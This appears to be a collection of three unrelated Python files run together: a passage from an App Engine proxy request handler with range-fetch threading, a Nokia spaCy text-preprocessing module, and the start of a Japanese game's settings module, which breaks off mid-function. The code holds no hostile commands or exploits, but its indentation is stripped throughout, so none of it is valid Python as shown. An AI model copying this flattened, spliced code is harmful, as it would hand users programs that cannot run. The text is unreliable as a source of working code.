wfile.write("HTTP/1.1 %d\r\n" % status)
for key, value in headers.items():
#wfile.write("%s: %s\r\n" % (key, value))
send_header(wfile, key, value)
wfile.write("\r\n")
wfile.write(body)
except:
xlog.warn("send response fail")
def return_fail_message(wfile):
html = generate_message_html(
'504 GAEProxy Proxy Time out', u'连接超时,先休息一会再来!')
send_response(wfile, 504, body=html.encode('utf-8'))
return
def pack_request(method, url, headers, body, timeout):
headers = dict(headers)
if isinstance(body, basestring) and body:
if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
# 可以压缩
zbody = deflate(body)
if len(zbody) < len(body):
body = zbody
headers['Content-Encoding'] = 'deflate'
if len(body) > 10 * 1024 * 1024:
xlog.warn("body len:%d %s %s", len(body), method, url)
headers['Content-Length'] = str(len(body))
# GAE don't allow set `Host` header
if 'Host' in headers:
del headers['Host']
kwargs = {}
# gae 用的参数
if front.config.GAE_PASSWORD:
kwargs['password'] = front.config.GAE_PASSWORD
# kwargs['options'] =
kwargs['validate'] = front.config.GAE_VALIDATE
if url.endswith(".js"):
kwargs['maxsize'] = front.config.JS_MAXSIZE
else:
kwargs['maxsize'] = front.config.AUTORANGE_MAXSIZE
kwargs['timeout'] = str(timeout)
# gae 用的参数 end
payload = '%s %s HTTP/1.1\r\n' % (method, url)
payload += ''.join('%s: %s\r\n' % (k, v)
for k, v in headers.items() if k not in skip_request_headers)
# for k, v in headers.items():
# xlog.debug("Send %s: %s", k, v)
payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v)
for k, v in kwargs.items() if v)
payload = deflate(payload)
body = '%s%s%s' % (struct.pack('!h', len(payload)), payload, body)
request_headers = {}
request_headers['Content-Length'] = str(len(body))
# request_headers 只有上面一项
return request_headers, body
def unpack_response(response):
try:
data = response.task.read(size=2)
if not data:
raise GAE_Exception(600, "get protocol head fail")
if len(data) !=2:
raise GAE_Exception(600, "get protocol head fail, data:%s, len:%d" % (data, len(data)))
headers_length, = struct.unpack('!h', data)
data = response.task.read(size=headers_length)
if not data:
raise GAE_Exception(600,
"get protocol head fail, len:%d" % headers_length)
raw_response_line, headers_data = inflate(data).split('\r\n', 1)
_, status, reason = raw_response_line.split(None, 2)
response.app_status = int(status)
response.app_reason = reason.strip()
headers_block, app_msg = headers_data.split('\r\n\r\n')
headers_pairs = headers_block.split('\r\n')
response.headers = {}
for pair in headers_pairs:
if not pair:
break
k, v = pair.split(': ', 1)
response.headers[k] = v
response.app_msg = app_msg
return response
except Exception as e:
response.worker.close("unpack protocol error")
raise GAE_Exception(600, "unpack protocol:%r at:%s" % (e, traceback.format_exc()))
def request_gae_server(headers, body, url, timeout):
# process on http protocol
# process status code return by http server
# raise error, let up layer retry.
try:
response = front.request("POST", None, "/_gh/", headers, body, timeout)
if not response:
raise GAE_Exception(600, "fetch gae fail")
if response.status >= 600:
raise GAE_Exception(
response.status, "fetch gae fail:%d" % response.status)
appid = response.ssl_sock.host.split(".")[0]
if response.status == 404:
# xlog.warning('APPID %r not exists, remove it.', response.ssl_sock.appid)
front.appid_manager.report_not_exist(
appid, response.ssl_sock.ip)
# google_ip.report_connect_closed(response.ssl_sock.ip, "appid not exist")
response.worker.close("appid not exist:%s" % appid)
raise GAE_Exception(603, "appid not exist %s" % appid)
if response.status == 503:
xlog.warning('APPID %r out of Quota, remove it. %s',
appid, response.ssl_sock.ip)
front.appid_manager.report_out_of_quota(appid)
# google_ip.report_connect_closed(response.ssl_sock.ip, "out of quota")
response.worker.close("appid out of quota:%s" % appid)
raise GAE_Exception(604, "appid out of quota:%s" % appid)
server_type = response.getheader("server", "")
# content_type = response.getheaders("content-type", "")
if ("gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type) or \
response.status == 403 or response.status == 405:
# some ip can connect, and server type can be gws
# but can't use as GAE server
# so we need remove it immediately
xlog.warn("IP:%s not support GAE, headers:%s status:%d", response.ssl_sock.ip, response.headers,
response.status)
response.worker.close("ip not support GAE")
raise GAE_Exception(602, "ip not support GAE")
response.gps = response.getheader("x-server", "")
if response.status > 300:
raise GAE_Exception(605, "status:%d" % response.status)
if response.status != 200:
xlog.warn("GAE %s appid:%s status:%d", response.ssl_sock.ip,
appid, response.status)
return response
except GAE_Exception as e:
if e.error_code not in (600, 603, 604):
front.ip_manager.recheck_ip(response.ssl_sock.ip, first_report=False)
raise e
def request_gae_proxy(method, url, headers, body, timeout=None):
headers = dict(headers)
# make retry and time out
time_request = time.time()
# GAE urlfetch will not decode br if Accept-Encoding include gzip
accept_encoding = headers.get("Accept-Encoding", "")
if "br" in accept_encoding:
accept_br_encoding = True
# xlog.debug("accept_br_encoding for %s", url)
else:
accept_br_encoding = False
host = headers.get("Host", "")
if not host:
parsed_url = urlparse.urlparse(url)
host = parsed_url.hostname
accept_codes = accept_encoding.replace(" ", "").split(",")
try:
accept_codes.remove("")
except:
pass
if not accept_br_encoding:
if "gzip" in accept_encoding:
if host in front.config.br_sites or host.endswith(front.config.br_endswith):
accept_codes.remove("gzip")
if "br" not in accept_codes:
accept_codes.append("br")
accept_code_str = ",".join(accept_codes)
if accept_code_str:
headers["Accept-Encoding"] = accept_code_str
else:
del headers["Accept-Encoding"]
error_msg = []
if not timeout:
timeouts = [15, 20, 30]
else:
timeouts = [timeout]
if body:
timeouts = [timeout + 10 for timeout in timeouts]
for timeout in timeouts:
request_headers, request_body = pack_request(method, url, headers, body, timeout)
try:
response = request_gae_server(request_headers, request_body, url, timeout)
response = unpack_response(response)
# xlog.debug("accept:%s content-encoding:%s url:%s", accept_encoding,
# response.headers.get("Content-Encoding", ""), url)
if not accept_br_encoding:
# if gzip in Accept-Encoding, br will not decode in urlfetch
# else, urlfetch in GAE will auto decode br, but return br in Content-Encoding
if response.headers.get("Content-Encoding", "") == "br":
# GAE urlfetch always return br in content-encoding even have decoded it.
del response.headers["Content-Encoding"]
# xlog.debug("remove br from Content-Encoding, %s", url)
if host not in front.config.br_sites:
front.config.BR_SITES.append(host)
front.config.save()
front.config.load()
xlog.warn("Add %s to br_sites", host)
if response.app_msg:
xlog.warn("server app return fail, status:%d",
response.app_status)
# if len(response.app_msg) < 2048:
# xlog.warn('app_msg:%s', cgi.escape(response.app_msg))
if response.app_status == 510:
# reach 80% of traffic today
# disable for get big file.
appid = response.ssl_sock.host.split(".")[0]
front.appid_manager.report_out_of_quota(appid)
response.worker.close(
"appid out of quota:%s" % appid)
continue
return response
except GAE_Exception as e:
err_msg = "gae_exception:%r %s" % (e, url)
error_msg.append(err_msg)
xlog.warn("gae_exception:%r %s", e, url)
if e.message == '605:status:500':
raise e
except Exception as e:
err_msg = 'gae_handler.handler %r %s , retry...' % (e, url)
error_msg.append(err_msg)
xlog.exception('gae_handler.handler %r %s , retry...', e, url)
raise GAE_Exception(600, b"".join(error_msg))
def handler(method, host, url, headers, body, wfile, fallback=None):
if not url.startswith("http") and not url.startswith("HTTP"):
xlog.error("gae:%s", url)
return
request_time = time.time()
org_headers = dict(headers)
remove_list = []
req_range_begin = ""
req_range_end = ""
req_range = ""
for k, v in headers.items():
if v == "":
remove_list.append(k)
continue
if k.lower() == "range":
req_range = v
req_range_begin, req_range_end = tuple(
x for x in re.search(r'bytes=(\d*)-(\d*)', v).group(1, 2))
# fix bug for android market app: Mobogenie
# GAE url_fetch refuse empty value in header.
for key in remove_list:
del headers[key]
# force to get content range
# reduce wait time
if method == "GET":
if req_range_begin and not req_range_end:
# don't known how many bytes to get, but get from begin position
req_range_begin = int(req_range_begin)
headers["Range"] = "bytes=%d-%d" % (
req_range_begin, req_range_begin + front.config.AUTORANGE_MAXSIZE - 1)
xlog.debug("change Range %s => %s %s",
req_range, headers["Range"], url)
elif req_range_begin and req_range_end:
req_range_begin = int(req_range_begin)
req_range_end = int(req_range_end)
if req_range_end - req_range_begin + 1 > front.config.AUTORANGE_MAXSIZE:
headers["Range"] = "bytes=%d-%d" % (
req_range_begin, req_range_begin + front.config.AUTORANGE_MAXSIZE - 1)
# remove wait time for GAE server to get knowledge that content
# size exceed the max size per fetch
xlog.debug("change Range %s => %s %s",
req_range, headers["Range"], url)
elif not req_range_begin and req_range_end:
# get the last n bytes of content
pass
else:
# no begin and no end
# don't add range, some host like github don't support Range.
# headers["Range"] = "bytes=0-%d" % config.AUTORANGE_MAXSIZE
pass
try:
response = request_gae_proxy(method, url, headers, body)
# http://en.wikipedia.org/wiki/Chunked_transfer_encoding
response.headers.pop("Transfer-Encoding", None)
# gae代理请求
except GAE_Exception as e:
xlog.warn("GAE %s %s request fail:%r", method, url, e)
if fallback and host.endswith(front.config.GOOGLE_ENDSWITH):
return fallback()
send_response(wfile, e.error_code, body=e.message)
return_fail_message(wfile)
return "ok"
if response.app_msg:
# XX-net 自己数据包
send_response(wfile, response.app_status, body=response.app_msg)
return "ok"
else:
response.status = response.app_status
if response.status == 206:
# use org_headers
# RangeFetch need to known the real range end
# 需要分片
return RangeFetch2(method, url, org_headers,
body, response, wfile).run()
response_headers = {}
# 初始化给客户端的headers
for key, value in response.headers.items():
key = key.title()
if key in skip_response_headers:
continue
response_headers[key] = value
response_headers["Persist"] = ""
response_headers["Connection"] = "Persist"
if 'X-Head-Content-Length' in response_headers:
if method == "HEAD":
response_headers['Content-Length'] = response_headers['X-Head-Content-Length']
del response_headers['X-Head-Content-Length']
# 只是获取头
content_length = int(response.headers.get('Content-Length', 0))
content_range = response.headers.get('Content-Range', '')
# content_range 分片时合并用到
if content_range and 'bytes */' not in content_range:
start, end, length = tuple(int(x) for x in re.search(
r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))
else:
start, end, length = 0, content_length - 1, content_length
# 未分片
if method == "HEAD":
body_length = 0
else:
body_length = end - start + 1
def send_response_headers():
wfile.write("HTTP/1.1 %d %s\r\n" % (response.status, response.reason))
for key, value in response_headers.items():
send_header(wfile, key, value)
# xlog.debug("Head- %s: %s", key, value)
wfile.write("\r\n")
# 写入除body外内容
def is_text_content_type(content_type):
mct, _, sct = content_type.partition('/')
if mct == 'text':
return True
if mct == 'application':
sct = sct.split(';', 1)[0]
if (sct in ('json', 'javascript', 'x-www-form-urlencoded') or
sct.endswith(('xml', 'script')) or
sct.startswith(('xml', 'rss', 'atom'))):
return True
return False
data0 = ""
content_type = response_headers.get("Content-Type", "")
content_encoding = response_headers.get("Content-Encoding", "")
if body_length and \
content_encoding == "gzip" and \
response.gps < "GPS 3.3.2" and \
is_text_content_type(content_type):
url_guess_type = guess_type(url)[0]
if url_guess_type is None or is_text_content_type(url_guess_type):
# try decode and detect type
min_block = min(1024, body_length)
data0 = response.task.read(min_block)
if not data0 or len(data0) == 0:
xlog.warn("recv body fail:%s", url)
return
gzip_decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS)
decoded_data0 = gzip_decompressor.decompress(data0)
deflate_decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
decoded_data1 = None
if len(decoded_data0) > 1:
CMF, FLG = bytearray(decoded_data0[:2])
if CMF & 0x0F == 8 and CMF & 0x80 == 0 and ((CMF << 8) + FLG) % 31 == 0:
decoded_data1 = deflate_decompressor.decompress(decoded_data0[2:])
if decoded_data1 is None and len(decoded_data0) > 0:
try:
decoded_data1 = deflate_decompressor.decompress(decoded_data0)
if deflate_decompressor.unused_data != '':
decoded_data1 = None
except:
pass
if decoded_data1:
try:
response_headers.pop("Content-Length", None)
if "deflate" in headers.get("Accept-Encoding", ""):
# return deflate data if accept deflate
response_headers["Content-Encoding"] = "deflate"
send_response_headers()
while True:
wfile.write(decoded_data0)
if response.task.body_readed >= body_length:
break
data = response.task.read()
decoded_data0 = gzip_decompressor.decompress(data)
xlog.info("GAE send ungziped deflate data to browser t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method,
url, response.task.get_trace())
else:
# inflate data and send
del response_headers["Content-Encoding"]
send_response_headers()
while True:
wfile.write(decoded_data1)
if response.task.body_readed >= body_length:
break
data = response.task.read()
decoded_data0 = gzip_decompressor.decompress(data)
decoded_data1 = deflate_decompressor.decompress(decoded_data0)
xlog.info("GAE send ungziped data to browser t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method,
url, response.task.get_trace())
return
except Exception as e:
xlog.info("gae_handler.handler try decode and send response fail. e:%r %s", e, url)
return
try:
send_response_headers()
if data0:
wfile.write(data0)
body_sended = len(data0)
else:
body_sended = 0
except Exception as e:
xlog.info("gae_handler.handler send response fail. e:%r %s", e, url)
return
while True:
# 可能分片发给客户端
if body_sended >= body_length:
break
data = response.task.read()
if not data:
xlog.warn("get body fail, until:%d %s",
body_length - body_sended, url)
break
body_sended += len(data)
try:
# https 包装
ret = wfile.write(data)
if ret == ssl.SSL_ERROR_WANT_WRITE or ret == ssl.SSL_ERROR_WANT_READ:
#xlog.debug("send to browser wfile.write ret:%d", ret)
#ret = wfile.write(data)
wfile.write(data)
except Exception as e_b:
if e_b[0] in (errno.ECONNABORTED, errno.EPIPE,
errno.ECONNRESET) or 'bad write retry' in repr(e_b):
xlog.info('gae_handler send to browser return %r %r, len:%d, sended:%d', e_b, url, body_length, body_sended)
else:
xlog.info('gae_handler send to browser return %r %r', e_b, url)
return
# 完整一次https请求
xlog.info("GAE t:%d s:%d %s %s %s", (time.time() - request_time) * 1000, content_length, method, url,
response.task.get_trace())
return "ok"
class RangeFetch2(object):
all_data_size = {}
def __init__(self, method, url, headers, body, response, wfile):
self.method = method
self.wfile = wfile
self.url = url
self.headers = headers
self.body = body
self.response = response
self.keep_running = True
self.blocked = False
self.lock = threading.Lock()
self.waiter = threading.Condition(self.lock)
self.data_list = {}
# begin => payload
self.data_size = 0
self.req_begin = 0
self.req_end = 0
self.wait_begin = 0
def get_all_buffer_size(self):
return sum(v for k, v in self.all_data_size.items())
def put_data(self, range_begin, payload):
with self.lock:
if range_begin < self.wait_begin:
raise Exception("range_begin:%d expect:%d" %
(range_begin, self.wait_begin))
self.data_list[range_begin] = payload
self.data_size += len(payload)
self.all_data_size[self] = self.data_size
if self.wait_begin in self.data_list:
self.waiter.notify()
def run(self):
req_range_begin = None
req_range_end = None
for k, v in self.headers.items():
# xlog.debug("range req head:%s => %s", k, v)
if k.lower() == "range":
req_range_begin, req_range_end = tuple(
x for x in re.search(r'bytes=(\d*)-(\d*)', v).group(1, 2))
# break
response_headers = dict((k.title(), v)
for k, v in self.response.headers.items())
content_range = response_headers['Content-Range']
res_begin, res_end, res_length = tuple(int(x) for x in re.search(
r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))
self.req_begin = res_end + 1
if req_range_begin and req_range_end:
self.req_end = int(req_range_end)
else:
self.req_end = res_length - 1
self.wait_begin = res_begin
if self.wait_begin == 0 and self.req_end == res_length - 1:
response_headers['Content-Length'] = str(res_length)
del response_headers['Content-Range']
state_code = 200
else:
response_headers['Content-Range'] = 'bytes %s-%s/%s' % (
res_begin, self.req_end, res_length)
response_headers['Content-Length'] = str(
self.req_end - res_begin + 1)
state_code = 206
response_headers["Persist"] = ""
response_headers["Connection"] = "Persist"
xlog.info('RangeFetch %d-%d started(%r) ',
res_begin, self.req_end, self.url)
try:
self.wfile.write("HTTP/1.1 %d OK\r\n" % state_code)
for key in response_headers:
if key in skip_response_headers:
continue
value = response_headers[key]
#xlog.debug("Head %s: %s", key.title(), value)
send_header(self.wfile, key, value)
self.wfile.write("\r\n")
except Exception as e:
self.keep_running = False
xlog.info("RangeFetch send response fail:%r %s", e, self.url)
return
data_left_to_fetch = self.req_end - self.req_begin + 1
fetch_times = int(
(data_left_to_fetch + front.config.AUTORANGE_MAXSIZE - 1) / front.config.AUTORANGE_MAXSIZE)
thread_num = min(front.config.AUTORANGE_THREADS, fetch_times)
for i in xrange(0, thread_num):
threading.Thread(target=self.fetch_worker).start()
threading.Thread(target=self.fetch, args=(
res_begin, res_end, self.response)).start()
ok = "ok"
while self.keep_running and \
(front.config.use_ipv6 == "force_ipv6" and \
check_local_network.IPv6.is_ok() or \
front.config.use_ipv6 != "force_ipv6" and \
check_local_network.is_ok()) and \
self.wait_begin < self.req_end + 1:
with self.lock:
if self.wait_begin not in self.data_list:
self.waiter.wait()
if self.wait_begin not in self.data_list:
xlog.error("get notify but no data")
continue
else:
data = self.data_list[self.wait_begin]
del self.data_list[self.wait_begin]
self.wait_begin += len(data)
self.data_size -= len(data)
self.all_data_size[self] = self.data_size
try:
ret = self.wfile.write(data)
if ret == ssl.SSL_ERROR_WANT_WRITE or ret == ssl.SSL_ERROR_WANT_READ:
xlog.debug(
"send to browser wfile.write ret:%d, retry", ret)
ret = self.wfile.write(data)
xlog.debug("send to browser wfile.write ret:%d", ret)
del data
except Exception as e:
xlog.info('RangeFetch client closed(%s). %s', e, self.url)
ok = None
break
self.keep_running = False
self.all_data_size.pop(self, None)
return ok
def fetch_worker(self):
blocked = False
while self.keep_running:
if blocked:
time.sleep(0.5)
with self.lock:
# at least 2 wait workers keep running
if self.req_begin > self.wait_begin + front.config.AUTORANGE_MAXSIZE:
if self.get_all_buffer_size() > front.config.AUTORANGE_MAXBUFFERSIZE * (0.8 + len(self.all_data_size) * 0.2):
if not self.blocked:
xlog.debug("fetch_worker blocked, buffer:%d %s",
self.data_size, self.url)
self.blocked = blocked = True
continue
self.blocked = blocked = False
if self.req_begin >= self.req_end + 1:
break
begin = self.req_begin
end = min(begin + front.config.AUTORANGE_MAXSIZE - 1, self.req_end)
self.req_begin = end + 1
self.fetch(begin, end, None)
def fetch(self, begin, end, first_response):
headers = dict((k.title(), v) for k, v in self.headers.items())
retry_num = 0
while self.keep_running:
retry_num += 1
if retry_num > 20:
xlog.warn("RangeFetch try max times, exit. %s", self.url)
self.close()
break
expect_len = end - begin + 1
headers['Range'] = 'bytes=%d-%d' % (begin, end)
if first_response:
response = first_response
else:
try:
response = request_gae_proxy(
self.method, self.url, headers, self.body)
except GAE_Exception as e:
xlog.warning('RangeFetch %s request fail:%r',
headers['Range'], e)
continue
if response.app_msg:
response.worker.close(
"range get gae status:%d" % response.app_status)
continue
response.status = response.app_status
if response.headers.get('Location', None):
self.url = urlparse.urljoin(
self.url, response.headers.get('Location'))
xlog.warn('RangeFetch Redirect(%r) status:%s',
self.url, response.status)
continue
if response.status >= 300:
#xlog.error('RangeFetch %r return %s :%s', self.url, response.status, cgi.escape(response.body))
response.worker.close("range status:%s" % response.status)
continue
content_range = response.headers.get('Content-Range', "")
if not content_range:
xlog.warning('RangeFetch "%s %s" return headers=%r, retry %s-%s',
self.method, self.url, response.headers, begin, end)
# if len(response.body) < 2048:
#xlog.warn('body:%s', cgi.escape(response.body))
# response.worker.close("no range")
continue
content_length = int(response.headers.get('Content-Length', 0))
data_readed = 0
while True:
if data_readed >= content_length:
percent = begin * 100 / self.req_end
xlog.debug('RangeFetch [%s] %d%% length:%s range:%s %s %s',
response.ssl_sock.ip, percent,
content_length, content_range, self.url, response.task.get_trace())
break
data = response.task.read()
if not data:
xlog.warn("RangeFetch [%s] get body fail, begin:%d %s",
response.ssl_sock.ip, begin, self.url)
break
data_len = len(data)
data_readed += data_len
if data_len > expect_len:
xlog.warn("RangeFetch expect:%d, get:%d",
expect_len, data_len)
data = data[:expect_len]
data_len = expect_len
self.put_data(begin, data)
expect_len -= data_len
begin += data_len
if begin >= end + 1:
break
xlog.warn("RangeFetch get left, begin:%d end:%d", begin, end)
def close(self):
self.keep_running = False
with self.lock:
self.waiter.notify()
|
text_preprocessing.py | # © 2020 Nokia
#
# Licensed under the BSD 3 Clause license
#
# SPDX-License-Identifier: BSD-3-Clause
# ============================================
import re
import time
from threading import Thread
from traceback import print_exc
import spacy
from codesearch.stopwords import stopwords
def async_fn(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.setDaemon(True)
thr.start()
return wrapper
_nlp = None
_initializing_nlp = False
@async_fn
def init_nlp():
try:
global _nlp, _initializing_nlp
if _initializing_nlp: return
_initializing_nlp = True
if spacy.__version__[0] == '3':
nlp = spacy.load("en_core_web_md", disable=['parser', 'ner', 'tagger'])
else:
nlp = spacy.load("en_core_web_md", vectors=False, disable=['parser', 'ner', 'tagger'])
for word in nlp.vocab:
word.is_stop = False
for word in stopwords:
t = nlp.vocab[word]
t.is_stop = True
t = nlp.vocab[word.capitalize()]
t.is_stop = True
_nlp = nlp
print("\nInitialized spacy nlp")
except:
print_exc()
_nlp = -1
def nlp():
i = 0
progress_symbols = ["|", "/", "─", "\\"]
while _nlp is None:
if not _initializing_nlp:
init_nlp()
print(f"\rInitializing spacy nlp {progress_symbols[i % 4]}", end="")
time.sleep(1)
i += 1
return _nlp
def preprocess_text(text, lemmatize=True, remove_stop=True, clean_howto=True):
if clean_howto:
text = clean_how_to(text)
tokens = nlp()(text)
if remove_stop:
tokens = [t for t in tokens if not t.is_stop and str(t) not in {"#", "//", "/**", "*/"}]
else:
tokens = [t for t in tokens if str(t) not in {"#", "//", "/**", "*/"} ]
tokens = [t for t in tokens if not str(t).isspace()]
if lemmatize:
tokens = [t.lemma_.lower().strip() for t in tokens]
else:
tokens = [str(t).lower().strip() for t in tokens]
return tokens
def compute_overlap(q, d):
q_toks = set(t.lemma_.lower() for t in nlp()(q) if not t.is_stop)
d_toks = set(t.lemma_.lower() for t in nlp()(d) if not t.is_stop)
return len(q_toks & d_toks), len(q_toks & d_toks)/(len(q_toks))
how_to_pattern = "^([hH]ow to |[hH]ow do ([Ii] |you )|[Hh]ow does one |([tT]he )?[Bb]est way to |([Hh]ow )?[Cc]an (you |[Ii] ))"
def is_how_to(t):
return re.match(how_to_pattern, t)
def clean_how_to(t):
t = re.sub(how_to_pattern, "", t)
if t.endswith("?"):
t = t[:-1]
return t[0].capitalize() + t[1:]
|
setting.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import ctypes
import hashlib
import inspect
import math
import struct
import shutil
import weakref
import array
import re
import threading
import copy
import ConfigParser
import time
import wx
import pygame
import pygame.locals
import cw
class NoFontError(ValueError):
pass
if sys.platform <> "win32":
# wx.Appのロード前にフォントをインストールしなければならない
try:
fontconfig = ctypes.CDLL("libfontconfig.so")
except:
try:
fontconfig = ctypes.CDLL("libfontconfig.so.1")
except:
fontconfig = None
if fontconfig:
fcconfig = fontconfig.FcConfigGetCurrent()
for dpath, dnames, fnames in os.walk(u"Data"):
for fname in fnames:
if fname.lower().endswith(".ttf"):
path = os.path.join(dpath, fname)
if os.path.isfile(path):
fontconfig.FcConfigAppFontAddFile(fcconfig, path)
# マウスホイールを上回転させた時の挙動
WHEEL_SELECTION = "Selection" # カードや選択肢を選ぶ
WHEEL_SHOWLOG = "ShowLog" # バックログを表示
# カーソルのタイプ
CURSOR_BLACK = "Black" # 黒いカーソル(デフォルト)
CURSOR_WHITE = "White" # 白いカーソル
# メッセージログの表示形式
LOG_SINGLE = "Single"
LOG_LIST = "List"
LOG_COMPRESS = "Compress"
# 起動時の挙動
OPEN_TITLE = "Title"
OPEN_LAST_BASE = "LastBase"
# 保存前のダイアログ表示の有無
CONFIRM_BEFORESAVING_YES = "True"
CONFIRM_BEFORESAVING_NO = "False"
CONFIRM_BEFORESAVING_BASE = "BaseOnly" # 宿にいる時に限り表示
# ステータスバーのボタン状態
SB_PRESSED = 0b00000001 # 押下
SB_CURRENT = 0b00000010 # カーソル下
SB_DISABLE = 0b00000100 # 無効状態
SB_NOTICE = 0b00001000 # 通知
SB_EMPHASIZE = 0b00010000 # 強調
class LocalSetting(object):
def __init__(self):
"""スキンで上書き可能な設定。"""
self.important_draw = False
self.important_font = False
self.mwincolour = (0, 0, 80, 180)
self.mwinframecolour = (128, 0, 0, 255)
self.blwincolour = (80, 80, 80, 180)
self.blwinframecolour = (128, 128, 128, 255)
self.curtaincolour = (0, 0, 80, 128)
self.blcurtaincolour = (0, 0, 0, 192)
self.fullscreenbackgroundtype = 2
self.fullscreenbackgroundfile = u"Resource/Image/Dialog/PAD"
self.decorationfont = False
self.bordering_cardname = True
self.fontsmoothing_message = False
self.fontsmoothing_cardname = False
self.fontsmoothing_statusbar = True
self.basefont = {
"gothic": "",
"uigothic": "",
"mincho": "",
"pmincho": "",
"pgothic": "",
}
self.fonttypes = {
"button": ("pgothic", "", -1, True, True, False),
"combo": ("uigothic", "", -1, False, False, False),
"tree": ("gothic", "", -1, False, False, False),
"tab": ("pgothic", "", -1, True, True, False),
"menu": ("uigothic", "", -1, False, False, False),
"scenario": ("pmincho", "", -1, True, True, False),
"targetlevel": ("pmincho", "", -1, True, True, True),
"paneltitle": ("pmincho", "", -1, True, True, False),
"paneltitle2": ("uigothic", "", -1, False, False, False),
"dlgmsg": ("uigothic", "", -1, True, True, False),
"dlgmsg2": ("uigothic", "", -1, False, False, False),
"dlgtitle": ("mincho", "", -1, True, True, False),
"dlgtitle2": ("pgothic", "", -1, True, True, True),
"createtitle": ("pgothic", "", -1, True, True, True),
"inputname": ("mincho", "", -1, True, True, False),
"datadesc": ("gothic", "", -1, False, False, False),
"charadesc": ("mincho", "", -1, True, True, False),
"charaparam": ("pmincho", "", -1, True, True, True),
"charaparam2": ("pmincho", "", -1, True, True, False),
"characre": ("pgothic", "", -1, True, True, False),
"dlglist": ("mincho", "", -1, True, True, False),
"uselimit": ("mincho", "", 18, False, False, False),
"cardname": ("uigothic", "", 12, True, True, False),
"ccardname": ("uigothic", "", 12, True, True, False),
"level": ("mincho", "", 33, True, True, True),
"numcards": ("uigothic", "", 18, False, False, False),
"message": ("mincho", "", 22, True, True, False),
"selectionbar": ("uigothic", "", 14, True, True, False),
"logpage": ("mincho", "", 24, False, False, False),
"sbarpanel": ("mincho", "", 16, True, True, False),
"sbarprogress": ("mincho", "", 16, True, True, False),
"sbarbtn": ("pgothic", "", 12, True, True, False),
"statusnum": ("mincho", "", 12, True, True, False), # 桁が増える毎に-2
"sbardesctitle": ("pgothic", "", 14, True, True, False),
"sbardesc": ("uigothic", "", 14, False, False, False),
"screenshot": ("pmincho", "", 18, False, False, False),
}
if sys.platform == "win32":
if u"Times New Roman" in wx.FontEnumerator.GetFacenames():
self.fonttypes["charaparam"] = "", u"Times New Roman", -1, True, True, True
self.fonttypes["dlgtitle"] = "", u"Times New Roman", -1, True, True, False
self.fonttypes["sbarpanel"] = "", u"Times New Roman", 15, True, True, True
# Windowsのフォントが使用可能であれば優先して使用する
facenames = set(wx.FontEnumerator().GetFacenames())
if u"MS UI Gothic" in facenames:
self.basefont["uigothic"] = u"MS UI Gothic"
if u"MS 明朝" in facenames:
self.basefont["mincho"] = u"MS 明朝"
if u"MS P明朝" in facenames:
self.basefont["pmincho"] = u"MS P明朝"
if u"MS ゴシック" in facenames:
self.basefont["gothic"] = u"MS ゴシック"
if u"MS Pゴシック" in facenames:
self.basefont["pgothic"] = u"MS Pゴシック"
for t in inspect.getmembers(self, lambda t: not inspect.isroutine(t)):
if not t[0].startswith("__"):
if isinstance(t[1], list):
v = t[1][:]
elif hasattr(t[1], "copy"):
v = t[1].copy()
else:
v = t[1]
setattr(self, "%s_init" % (t[0]), v)
def load(self, data):
"""dataから設定をロードする。"""
self.basefont = self.basefont_init.copy()
self.fonttypes = self.fonttypes_init.copy()
# 基本設定を上書きするか。
self.important_draw = data.getbool(".", "importantdrawing", False)
self.important_font = data.getbool(".", "importantfont", False)
# メッセージウィンドウの色と透明度
r = data.getint("MessageWindowColor", "red", self.mwincolour_init[0])
g = data.getint("MessageWindowColor", "green", self.mwincolour_init[1])
b = data.getint("MessageWindowColor", "blue", self.mwincolour_init[2])
a = data.getint("MessageWindowColor", "alpha", self.mwincolour_init[3])
self.mwincolour = Setting.wrap_colorvalue(r, g, b, a)
r = data.getint("MessageWindowFrameColor", "red", self.mwinframecolour_init[0])
g = data.getint("MessageWindowFrameColor", "green", self.mwinframecolour_init[1])
b = data.getint("MessageWindowFrameColor", "blue", self.mwinframecolour_init[2])
a = data.getint("MessageWindowFrameColor", "alpha", self.mwinframecolour_init[3])
self.mwinframecolour = Setting.wrap_colorvalue(r, g, b, a)
# バックログウィンドウの色と透明度
r = data.getint("MessageLogWindowColor", "red", self.blwincolour_init[0])
g = data.getint("MessageLogWindowColor", "green", self.blwincolour_init[1])
b = data.getint("MessageLogWindowColor", "blue", self.blwincolour_init[2])
a = data.getint("MessageLogWindowColor", "alpha", self.blwincolour_init[3])
self.blwincolour = Setting.wrap_colorvalue(r, g, b, a)
r = data.getint("MessageLogWindowFrameColor", "red", self.blwinframecolour_init[0])
g = data.getint("MessageLogWindowFrameColor", "green", self.blwinframecolour_init[1])
b = data.getint("MessageLogWindowFrameColor", "blue", self.blwinframecolour_init[2])
a = data.getint("MessageLogWindowFrameColor", "alpha", self.blwinframecolour_init[3])
self.blwinframecolour = Setting.wrap_colorvalue(r, g, b, a)
# メッセージログカーテン色
r = data.getint("MessageLogCurtainColor", "red", self.blcurtaincolour_init[0])
g = data.getint("MessageLogCurtainColor", "green", self.blcurtaincolour_init[1])
b = data.getint("MessageLogCurtainColor", "blue", self.blcurtaincolour_init[2])
a = data.getint("MessageLogCurtainColor", "alpha", self.blcurtaincolour_init[3])
self.blcurtaincolour = (r, g, b, a)
# カーテン色
r = data.getint("CurtainColor", "red", self.curtaincolour_init[0])
g = data.getint("CurtainColor", "green", self.curtaincolour_init[1])
b = data.getint("CurtainColor", "blue", self.curtaincolour_init[2])
a = data.getint("CurtainColor", "alpha", self.curtaincolour_init[3])
self.curtaincolour = (r, g, b, a)
# カード名を縁取りする
self.bordering_cardname = data.getbool("BorderingCardName", self.bordering_cardname_init)
# メッセージで装飾フォントを使用する
self.decorationfont = data.getbool("DecorationFont", self.decorationfont_init)
# メッセージの文字を滑らかにする
self.fontsmoothing_message = data.getbool("FontSmoothingMessage", self.fontsmoothing_message_init)
# カード名の文字を滑らかにする
